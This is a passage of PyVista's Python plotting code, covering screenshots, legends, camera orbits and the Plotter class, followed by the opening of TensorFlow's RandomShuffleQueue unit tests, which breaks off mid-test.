def add_point_scalar_labels(self, points, labels, fmt=None, preamble='', **kwargs):
"""Label the points from a dataset with the values of their scalars.
Wrapper for :func:`pyvista.BasePlotter.add_point_labels`.
Parameters
----------
points : np.ndarray or pyvista.Common
n x 3 numpy array of points or pyvista dataset with points
labels : str
String name of the point data array to use.
fmt : str
String formatter used to format numerical data
"""
if not is_pyvista_dataset(points):
raise TypeError(f'input points must be a pyvista dataset, not: {type(points)}')
if not isinstance(labels, str):
raise TypeError('labels must be a string name of the scalars array to use')
if fmt is None:
fmt = rcParams['font']['fmt']
if fmt is None:
fmt = '%.6e'
scalars = points.point_arrays[labels]
phrase = f'{preamble} %.3e'
labels = [phrase % val for val in scalars]
return self.add_point_labels(points, labels, **kwargs)
def add_points(self, points, **kwargs):
"""Add points to a mesh."""
kwargs['style'] = 'points'
return self.add_mesh(points, **kwargs)
def add_arrows(self, cent, direction, mag=1, **kwargs):
"""Add arrows to plotting object."""
direction = direction.copy()
if cent.ndim != 2:
cent = cent.reshape((-1, 3))
if direction.ndim != 2:
direction = direction.reshape((-1, 3))
direction[:,0] *= mag
direction[:,1] *= mag
direction[:,2] *= mag
pdata = pyvista.vector_poly_data(cent, direction)
# Create arrow object
arrow = vtk.vtkArrowSource()
arrow.Update()
glyph3D = vtk.vtkGlyph3D()
glyph3D.SetSourceData(arrow.GetOutput())
glyph3D.SetInputData(pdata)
glyph3D.SetVectorModeToUseVector()
glyph3D.Update()
arrows = wrap(glyph3D.GetOutput())
return self.add_mesh(arrows, **kwargs)
@staticmethod
def _save_image(image, filename, return_img=None):
"""Save a NumPy image array.
This is an internal helper.
"""
if not image.size:
raise ValueError('Empty image. Have you run plot() first?')
# write screenshot to file
supported_formats = [".png", ".jpeg", ".jpg", ".bmp", ".tif", ".tiff"]
if isinstance(filename, (str, pathlib.Path)):
filename = pathlib.Path(filename)
if isinstance(pyvista.FIGURE_PATH, str) and not filename.is_absolute():
filename = pathlib.Path(os.path.join(pyvista.FIGURE_PATH, filename))
if not filename.suffix:
filename = filename.with_suffix('.png')
elif filename.suffix not in supported_formats:
raise ValueError(f'Unsupported extension {filename.suffix}\n' +
f'Must be one of the following: {supported_formats}')
w = imageio.imwrite(os.path.abspath(os.path.expanduser(str(filename))),
image)
if not return_img:
return w
return image
def save_graphic(self, filename, title='PyVista Export', raster=True, painter=True):
"""Save a screenshot of the rendering window as a graphic file.
The supported formats are: '.svg', '.eps', '.ps', '.pdf', '.tex'
"""
if not hasattr(self, 'ren_win'):
raise AttributeError('This plotter is closed and unable to save a screenshot.')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
filename = os.path.abspath(os.path.expanduser(filename))
extension = pyvista.fileio.get_ext(filename)
valid = ['.svg', '.eps', '.ps', '.pdf', '.tex']
if extension not in valid:
raise ValueError(f"Extension ({extension}) is an invalid choice. Valid options include: {', '.join(valid)}")
writer = vtk.vtkGL2PSExporter()
modes = {
'.svg': writer.SetFileFormatToSVG,
'.eps': writer.SetFileFormatToEPS,
'.ps': writer.SetFileFormatToPS,
'.pdf': writer.SetFileFormatToPDF,
'.tex': writer.SetFileFormatToTeX,
}
writer.CompressOff()
writer.SetFilePrefix(filename.replace(extension, ''))
writer.SetInput(self.ren_win)
modes[extension]()
writer.SetTitle(title)
writer.SetWrite3DPropsAsRasterImage(raster)
if painter:
writer.UsePainterSettings()
writer.Update()
return
def screenshot(self, filename=None, transparent_background=None,
return_img=None, window_size=None):
"""Take screenshot at current camera position.
Parameters
----------
filename : str, optional
Location to write image to. If None, no image is written.
transparent_background : bool, optional
Makes the background transparent. Default False.
return_img : bool, optional
If a string filename is given and this is true, a NumPy array of
the image will be returned.
Return
------
img : numpy.ndarray
Array containing pixel RGB and alpha. Sized:
[Window height x Window width x 3] for transparent_background=False
[Window height x Window width x 4] for transparent_background=True
Examples
--------
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> plotter = pyvista.Plotter(off_screen=True)
>>> actor = plotter.add_mesh(sphere)
>>> plotter.screenshot('screenshot.png') # doctest:+SKIP
"""
if window_size is not None:
self.window_size = window_size
# configure image filter
if transparent_background is None:
transparent_background = rcParams['transparent_background']
self.image_transparent_background = transparent_background
# This if statement allows you to save screenshots of closed plotters
# This is needed for the sphinx-gallery work
if not hasattr(self, 'ren_win'):
# If plotter has been closed...
# check if last_image exists
if hasattr(self, 'last_image'):
# Save last image
return self._save_image(self.last_image, filename, return_img)
# Plotter hasn't been rendered or was improperly closed
raise AttributeError('This plotter is closed and unable to save a screenshot.')
if self._first_time and not self.off_screen:
raise RuntimeError("Nothing to screenshot - call .show first or "
"use the off_screen argument")
self.render()
# debug: this needs to be called twice for some reason,
img = self.image
img = self.image
return self._save_image(img, filename, return_img)
def add_legend(self, labels=None, bcolor=(0.5, 0.5, 0.5), border=False,
size=None, name=None):
"""Add a legend to render window.
Entries must be a list containing one string and color entry for each
item.
Parameters
----------
labels : list, optional
When set to None, uses existing labels as specified by
- add_mesh
- add_lines
- add_points
List containing one entry for each item to be added to the
legend. Each entry must contain two strings, [label,
color], where label is the name of the item to add, and
color is the color of the label to add.
bcolor : list or string, optional
Background color, either a three item 0 to 1 RGB color
list, or a matplotlib color string (e.g. 'w' or 'white'
for a white color). If None, legend background is
disabled.
border : bool, optional
Controls if there will be a border around the legend.
Default False.
size : list, optional
Two float list, each float between 0 and 1. For example
[0.1, 0.1] would make the legend 10% the size of the
entire figure window.
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
Return
------
legend : vtk.vtkLegendBoxActor
Actor for the legend.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> othermesh = examples.load_uniform()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh, label='My Mesh')
>>> _ = plotter.add_mesh(othermesh, 'k', label='My Other Mesh')
>>> _ = plotter.add_legend()
>>> plotter.show() # doctest:+SKIP
Alternative manual example
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> othermesh = examples.load_uniform()
>>> legend_entries = []
>>> legend_entries.append(['My Mesh', 'w'])
>>> legend_entries.append(['My Other Mesh', 'k'])
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh)
>>> _ = plotter.add_mesh(othermesh, 'k')
>>> _ = plotter.add_legend(legend_entries)
>>> plotter.show() # doctest:+SKIP
"""
self.legend = vtk.vtkLegendBoxActor()
if labels is None:
# use existing labels
if not self._labels:
raise ValueError('No labels input.\n\n'
'Add labels to individual items when adding them to'
'the plotting object with the "label=" parameter. '
'or enter them as the "labels" parameter.')
self.legend.SetNumberOfEntries(len(self._labels))
for i, (vtk_object, text, color) in enumerate(self._labels):
self.legend.SetEntry(i, vtk_object, text, parse_color(color))
else:
self.legend.SetNumberOfEntries(len(labels))
legendface = pyvista.single_triangle()
for i, (text, color) in enumerate(labels):
self.legend.SetEntry(i, legendface, text, parse_color(color))
if size:
self.legend.SetPosition2(size[0], size[1])
if bcolor is None:
self.legend.UseBackgroundOff()
else:
self.legend.UseBackgroundOn()
self.legend.SetBackgroundColor(bcolor)
if border:
self.legend.BorderOn()
else:
self.legend.BorderOff()
# Add to renderer
self.add_actor(self.legend, reset_camera=False, name=name, pickable=False)
return self.legend
def set_background(self, color, top=None, all_renderers=True):
"""Set the background color.
Parameters
----------
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
top : string or 3 item list, optional, defaults to None
If given, this will enable a gradient background where the
``color`` argument is at the bottom and the color given in ``top``
will be the color at the top of the renderer.
all_renderers : bool
If True, applies to all renderers in subplots. If False, then
only applies to the active renderer.
"""
if all_renderers:
for renderer in self.renderers:
renderer.set_background(color, top=top)
self._shadow_renderer.set_background(color)
else:
self.renderer.set_background(color, top=top)
def remove_legend(self):
"""Remove the legend actor."""
if hasattr(self, 'legend'):
self.remove_actor(self.legend, reset_camera=False)
self.render()
def generate_orbital_path(self, factor=3., n_points=20, viewup=None, shift=0.0):
"""Generate an orbital path around the data scene.
Parameters
----------
factor : float
A scaling factor when biulding the orbital extent
n_points : int
number of points on the orbital path
viewup : list(float)
the normal to the orbital plane
shift : float, optional
shift the plane up/down from the center of the scene by this amount
"""
if viewup is None:
viewup = rcParams['camera']['viewup']
center = np.array(self.center)
bnds = np.array(self.bounds)
radius = (bnds[1] - bnds[0]) * factor
y = (bnds[3] - bnds[2]) * factor
if y > radius:
radius = y
center += np.array(viewup) * shift
return pyvista.Polygon(center=center, radius=radius, normal=viewup, n_sides=n_points)
def fly_to(self, point):
"""Move the current camera's focal point to a position point.
The movement is animated over the number of frames specified in
NumberOfFlyFrames. The LOD desired frame rate is used.
"""
if not hasattr(self, 'iren'):
raise AttributeError('This plotter does not have an interactive window')
return self.iren.FlyTo(self.renderer, *point)
def orbit_on_path(self, path=None, focus=None, step=0.5, viewup=None,
write_frames=False, threaded=False):
"""Orbit on the given path focusing on the focus point.
Parameters
----------
path : pyvista.PolyData
Path of orbital points. The order in the points is the order of
travel
focus : list(float) of length 3, optional
The point of focus the camera.
step : float, optional
The timestep between flying to each camera position
viewup : list(float)
the normal to the orbital plane
write_frames : bool
Assume a file is open and write a frame on each camera view during
the orbit.
threaded : bool, optional
Run this as a background thread. Generally used within a
GUI (i.e. PyQt).
"""
if focus is None:
focus = self.center
if viewup is None:
viewup = rcParams['camera']['viewup']
if path is None:
path = self.generate_orbital_path(viewup=viewup)
if not is_pyvista_dataset(path):
path = pyvista.PolyData(path)
points = path.points
# Make sure the whole scene is visible
self.camera.SetThickness(path.length)
def orbit():
"""Define the internal thread for running the orbit."""
for point in points:
self.set_position(point)
self.set_focus(focus)
self.set_viewup(viewup)
self.renderer.ResetCameraClippingRange()
self.render()
time.sleep(step)
if write_frames:
self.write_frame()
if threaded:
thread = Thread(target=orbit)
thread.start()
else:
orbit()
return
def export_vtkjs(self, filename, compress_arrays=False):
"""Export the current rendering scene as a VTKjs scene.
It can be used for rendering in a web browser.
"""
if not hasattr(self, 'ren_win'):
raise RuntimeError('Export must be called before showing/closing the scene.')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
else:
filename = os.path.abspath(os.path.expanduser(filename))
return export_plotter_vtkjs(self, filename, compress_arrays=compress_arrays)
def export_obj(self, filename):
"""Export scene to OBJ format."""
if not hasattr(self, "ren_win"):
raise RuntimeError("This plotter must still have a render window open.")
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
else:
filename = os.path.abspath(os.path.expanduser(filename))
exporter = vtk.vtkOBJExporter()
exporter.SetFilePrefix(filename)
exporter.SetRenderWindow(self.ren_win)
return exporter.Write()
def __del__(self):
"""Delete the plotter."""
if not self._closed:
self.close()
self.deep_clean()
del self.renderers
del self._shadow_renderer
def add_background_image(self, image_path, scale=1, auto_resize=True,
as_global=True):
"""Add a background image to a plot.
Parameters
----------
image_path : str
Path to an image file.
scale : float, optional
Scale the image larger or smaller relative to the size of
the window. For example, a scale size of 2 will make the
largest dimension of the image twice as large as the
largest dimension of the render window. Defaults to 1.
auto_resize : bool, optional
Resize the background when the render window changes size.
as_global : bool, optional
When multiple render windows are present, setting
``as_global=False`` will cause the background to only
appear in one window.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_mesh(pyvista.Sphere())
>>> plotter.add_background_image(examples.mapfile)
>>> plotter.show() # doctest:+SKIP
"""
# verify no render exists
if self._background_renderers[self._active_renderer_index] is not None:
raise RuntimeError('A background image already exists. '
'Remove it with remove_background_image '
'before adding one')
# Need to change the number of layers to support an additional
# background layer
self.ren_win.SetNumberOfLayers(3)
if as_global:
for renderer in self.renderers:
renderer.SetLayer(2)
view_port = None
else:
self.renderer.SetLayer(2)
view_port = self.renderer.GetViewport()
renderer = BackgroundRenderer(self, image_path, scale, view_port)
renderer.SetLayer(1)
self.ren_win.AddRenderer(renderer)
self._background_renderers[self._active_renderer_index] = renderer
# setup autoscaling of the image
if auto_resize and hasattr(self, 'iren'): # pragma: no cover
self._add_observer('ModifiedEvent', renderer.resize)
def remove_background_image(self):
"""Remove the background image from the current subplot."""
renderer = self._background_renderers[self._active_renderer_index]
if renderer is None:
raise RuntimeError('No background image to remove at this subplot')
renderer.deep_clean()
self._background_renderers[self._active_renderer_index] = None
def reset_camera_clipping_range(self):
"""Reset camera clipping planes."""
self.renderer.ResetCameraClippingRange()
class Plotter(BasePlotter):
"""Plotting object to display vtk meshes or numpy arrays.
Example
-------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> another_mesh = examples.load_uniform()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh, color='red')
>>> _ = plotter.add_mesh(another_mesh, color='blue')
>>> plotter.show() # doctest:+SKIP
Parameters
----------
off_screen : bool, optional
Renders off screen when True. Useful for automated screenshots.
notebook : bool, optional
When True, the resulting plot is placed inline a jupyter notebook.
Assumes a jupyter console is active. Automatically enables off_screen.
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one render window.
Can also accept a string descriptor as shape. E.g.:
* ``shape="3|1"`` means 3 plots on the left and 1 on the right,
* ``shape="4/2"`` means 4 plots on top and 2 at the bottom.
border : bool, optional
Draw a border around each render window. Default False.
border_color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
* ``color='white'``
* ``color='w'``
* ``color=[1, 1, 1]``
* ``color='#FFFFFF'``
window_size : list, optional
Window size in pixels. Defaults to [1024, 768]
multi_samples : int
The number of multi-samples used to mitigate aliasing. 4 is a good
default but 8 will have better results with a potential impact on
performance.
line_smoothing : bool
If True, enable line smothing
point_smoothing : bool
If True, enable point smothing
polygon_smoothing : bool
If True, enable polygon smothing
"""
last_update_time = 0.0
right_timer_id = -1
def __init__(self, off_screen=None, notebook=None, shape=(1, 1),
groups=None, row_weights=None, col_weights=None,
border=None, border_color='k', border_width=2.0,
window_size=None, multi_samples=None, line_smoothing=False,
point_smoothing=False, polygon_smoothing=False,
splitting_position=None, title=None):
"""Initialize a vtk plotting object."""
super().__init__(shape=shape, border=border,
border_color=border_color,
border_width=border_width,
groups=groups, row_weights=row_weights,
col_weights=col_weights,
splitting_position=splitting_position,
title=title)
log.debug('Plotter init start')
def on_timer(iren, event_id):
"""Exit application if interactive renderer stops."""
if event_id == 'TimerEvent':
self.iren.TerminateApp()
if off_screen is None:
off_screen = pyvista.OFF_SCREEN
if notebook is None:
notebook = scooby.in_ipykernel()
self.notebook = notebook
if self.notebook:
off_screen = True
self.off_screen = off_screen
if window_size is None:
window_size = rcParams['window_size']
self.__prior_window_size = window_size
if multi_samples is None:
multi_samples = rcParams['multi_samples']
# initialize render window
self.ren_win = vtk.vtkRenderWindow()
self.ren_win.SetMultiSamples(multi_samples)
self.ren_win.SetBorders(True)
if line_smoothing:
self.ren_win.LineSmoothingOn()
if point_smoothing:
self.ren_win.PointSmoothingOn()
if polygon_smoothing:
self.ren_win.PolygonSmoothingOn()
for renderer in self.renderers:
self.ren_win.AddRenderer(renderer)
# Add the shadow renderer to allow us to capture interactions within
# a given viewport
# https://vtk.org/pipermail/vtkusers/2018-June/102030.html
number_or_layers = self.ren_win.GetNumberOfLayers()
current_layer = self.renderer.GetLayer()
self.ren_win.SetNumberOfLayers(number_or_layers + 1)
self.ren_win.AddRenderer(self._shadow_renderer)
self._shadow_renderer.SetLayer(current_layer + 1)
self._shadow_renderer.SetInteractive(False) # never needs to capture
if self.off_screen:
self.ren_win.SetOffScreenRendering(1)
else: # Allow user to interact
self.iren = vtk.vtkRenderWindowInteractor()
self.iren.LightFollowCameraOff()
self.iren.SetDesiredUpdateRate(30.0)
self.iren.SetRenderWindow(self.ren_win)
self.enable_trackball_style() # internally calls update_style()
self._observers = {} # Map of events to observers of self.iren
self._add_observer("KeyPressEvent", self.key_press_event)
# Set background
self.set_background(rcParams['background'])
# Set window size
self.window_size = window_size
# add timer event if interactive render exists
self._add_observer(vtk.vtkCommand.TimerEvent, on_timer)
if rcParams["depth_peeling"]["enabled"]:
if self.enable_depth_peeling():
for renderer in self.renderers:
renderer.enable_depth_peeling()
log.debug('Plotter init stop')
def show(self, title=None, window_size=None, interactive=True,
auto_close=None, interactive_update=False, full_screen=False,
screenshot=False, return_img=False, use_panel=None, cpos=None,
height=400):
"""Display the plotting window.
Notes
-----
Please use the ``q``-key to close the plotter as some operating systems
(namely Windows) will experience issues saving a screenshot if the
exit button in the GUI is prressed.
Parameters
----------
title : string, optional
Title of plotting window.
window_size : list, optional
Window size in pixels. Defaults to [1024, 768]
interactive : bool, optional
Enabled by default. Allows user to pan and move figure.
auto_close : bool, optional
Enabled by default. Exits plotting session when user
closes the window when interactive is True.
interactive_update: bool, optional
Disabled by default. Allows user to non-blocking draw,
user should call Update() in each iteration.
full_screen : bool, optional
Opens window in full screen. When enabled, ignores
window_size. Default False.
use_panel : bool, optional
If False, the interactive rendering from panel will not be used in
notebooks
cpos : list(tuple(floats))
The camera position to use
height : int, optional
height for panel pane. Only used with panel.
Return
------
cpos : list
List of camera position, focal point, and view up
"""
if use_panel is None:
use_panel = rcParams['use_panel']
if auto_close is None:
auto_close = rcParams['auto_close']
if not hasattr(self, "ren_win"):
raise RuntimeError("This plotter has been closed and cannot be shown.")
# reset unless camera for the first render unless camera is set
if self._first_time: # and not self.camera_set:
for renderer in self.renderers:
if not renderer.camera_set and cpos is None:
renderer.camera_position = renderer.get_default_cam_pos()
renderer.ResetCamera()
elif cpos is not None:
renderer.camera_position = cpos
self._first_time = False
# if full_screen:
if full_screen:
self.ren_win.SetFullScreen(True)
self.ren_win.BordersOn() # super buggy when disabled
else:
if window_size is None:
window_size = self.window_size
self.ren_win.SetSize(window_size[0], window_size[1])
# Render
log.debug('Rendering')
self.render()
# This has to be after the first render for some reason
if title is None:
title = self.title
if title:
self.ren_win.SetWindowName(title)
self.title = title
# Keep track of image for sphinx-gallery
if pyvista.BUILDING_GALLERY or screenshot:
# always save screenshots for sphinx_gallery
self.last_image = self.screenshot(screenshot, return_img=True)
self.last_image_depth = self.get_image_depth()
disp = None
self.update() # For Windows issues. Resolves #186
# See: https://github.com/pyvista/pyvista/issues/186#issuecomment-550993270
if interactive and (not self.off_screen):
try: # interrupts will be caught here
log.debug('Starting iren')
self.update_style()
self.iren.Initialize()
if not interactive_update:
self.iren.Start()
except KeyboardInterrupt:
log.debug('KeyboardInterrupt')
self.close()
raise KeyboardInterrupt
elif self.notebook and use_panel and not hasattr(self, 'volume'):
try:
from panel.pane import VTK as panel_display
disp = panel_display(self.ren_win, sizing_mode='stretch_width',
height=height)
except:
pass
# In the event that the user hits the exit-button on the GUI (on
# Windows OS) then it must be finalized and deleted as accessing it
# will kill the kernel.
# Here we check for that and clean it up before moving on to any of
# the closing routines that might try to still access that
# render window.
if not self.ren_win.IsCurrent():
self._clear_ren_win() # The ren_win is deleted
# proper screenshots cannot be saved if this happens
if not auto_close:
warnings.warn("`auto_close` ignored: by clicking the exit button, you have destroyed the render window and we have to close it out.")
auto_close = True
# NOTE: after this point, nothing from the render window can be accessed
# as if a user presed the close button, then it destroys the
# the render view and a stream of errors will kill the Python
# kernel if code here tries to access that renderer.
# See issues #135 and #186 for insight before editing the
# remainder of this function.
# Get camera position before closing
cpos = self.camera_position
# NOTE: our conversion to panel currently does not support mult-view
# so we should display the static screenshot in notebooks for
# multi-view plots until we implement this feature
# If notebook is true and panel display failed:
if self.notebook and (disp is None or self.shape != (1, 1)):
import PIL.Image
# sanity check
try:
import IPython
except ImportError:
raise ImportError('Install IPython to display image in a notebook')
if not hasattr(self, 'last_image'):
self.last_image = self.screenshot(screenshot, return_img=True)
disp = IPython.display.display(PIL.Image.fromarray(self.last_image))
# Cleanup
if auto_close:
self.close()
# Return the notebook display: either panel object or image display
if self.notebook:
return disp
# If user asked for screenshot, return as numpy array after camera
# position
if return_img or screenshot is True:
return cpos, self.last_image
# default to returning last used camera position
return cpos
def plot(self, *args, **kwargs):
"""Create a plotting window.
Present for backwards compatibility.
DEPRECATED: Please use `show()` instead.
"""
logging.warning("`.plot()` is deprecated. Please use `.show()` instead.")
return self.show(*args, **kwargs)
def _style_factory(klass):
"""Create a subclass with capturing ability, return it."""
# We have to use a custom subclass for this because the default ones
# swallow the release events
# http://vtk.1045678.n5.nabble.com/Mouse-button-release-event-is-still-broken-in-VTK-6-0-0-td5724762.html # noqa
class CustomStyle(getattr(vtk, 'vtkInteractorStyle' + klass)):
def __init__(self, parent):
super().__init__()
self._parent = parent
self.AddObserver(
"LeftButtonPressEvent",
partial(try_callback, self._press))
self.AddObserver(
"LeftButtonReleaseEvent",
partial(try_callback, self._release))
def _press(self, obj, event):
# Figure out which renderer has the event and disable the
# others
super().OnLeftButtonDown()
if len(self._parent.renderers) > 1:
click_pos = self._parent.iren.GetEventPosition()
for renderer in self._parent.renderers:
interact = renderer.IsInViewport(*click_pos)
renderer.SetInteractive(interact)
def _release(self, obj, event):
super().OnLeftButtonUp()
if len(self._parent.renderers) > 1:
for renderer in self._parent.renderers:
renderer.SetInteractive(True)
return CustomStyle
|
random_shuffle_queue_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.Queue."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import re
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
class RandomShuffleQueueTest(test.TestCase):
def setUp(self):
# Useful for debugging when a test times out.
super(RandomShuffleQueueTest, self).setUp()
tf_logging.error("Starting: %s", self._testMethodName)
def tearDown(self):
super(RandomShuffleQueueTest, self).tearDown()
tf_logging.error("Finished: %s", self._testMethodName)
def testEnqueue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
self.assertAllEqual(0, q.size().eval())
enqueue_op.run()
self.assertAllEqual(1, q.size().eval())
def testEnqueueWithShape(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=tensor_shape.TensorShape([3, 2]))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
self.assertAllEqual(1, q.size().eval())
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
def testEnqueueManyWithShape(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (2,)])
q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
self.assertAllEqual(4, q.size().eval())
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shapes=tensor_shape.TensorShape([3]))
q2.enqueue(([1, 2, 3],))
q2.enqueue_many(([[1, 2, 3]],))
def testScalarShapes(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (1,)])
q.enqueue_many([[1, 2, 3, 4], [[5], [6], [7], [8]]]).run()
q.enqueue([9, [10]]).run()
dequeue_t = q.dequeue()
results = []
for _ in range(2):
a, b = sess.run(dequeue_t)
results.append((a, b))
a, b = sess.run(q.dequeue_many(3))
for i in range(3):
results.append((a[i], b[i]))
self.assertItemsEqual([(1, [5]), (2, [6]), (3, [7]), (4, [8]), (9, [10])],
results)
def testParallelEnqueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
sess.run(enqueue_op)
threads = [
self.checkedThread(
target=enqueue, args=(e,)) for e in enqueue_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in xrange(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
vals = [dequeued_t.eval() for _ in xrange(len(elems))]
self.assertItemsEqual(elems, vals)
def testEnqueueAndBlockingDequeue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(3, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for enqueue_op in enqueue_ops:
sess.run(enqueue_op)
results = []
def dequeue():
for _ in xrange(len(elems)):
results.append(sess.run(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, results)
def testMultiEnqueueAndDequeue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.int32, dtypes_lib.float32))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
results = []
for _ in xrange(len(elems)):
x, y = sess.run(dequeued_t)
results.append((x, y))
self.assertItemsEqual(elems, results)
def testQueueSizeEmpty(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
self.assertEqual(0, q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual([1], size.eval())
dequeued_t.op.run()
self.assertEqual([0], size.eval())
def testEnqueueMany(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + elems, results)
def testEmptyEnqueueMany(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
empty_t = constant_op.constant(
[], dtype=dtypes_lib.float32, shape=[0, 2, 3])
enqueue_op = q.enqueue_many((empty_t,))
size_t = q.size()
self.assertEqual(0, size_t.eval())
enqueue_op.run()
self.assertEqual(0, size_t.eval())
def testEmptyDequeueMany(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], dequeued_t.eval().tolist())
enqueue_op.run()
self.assertEqual([], dequeued_t.eval().tolist())
def testEmptyDequeueUpTo(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_up_to(0)
self.assertEqual([], dequeued_t.eval().tolist())
enqueue_op.run()
self.assertEqual([], dequeued_t.eval().tolist())
def testEmptyDequeueManyWithNoShape(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_many(0)
# Expect the operation to fail due to the shape not being constrained.
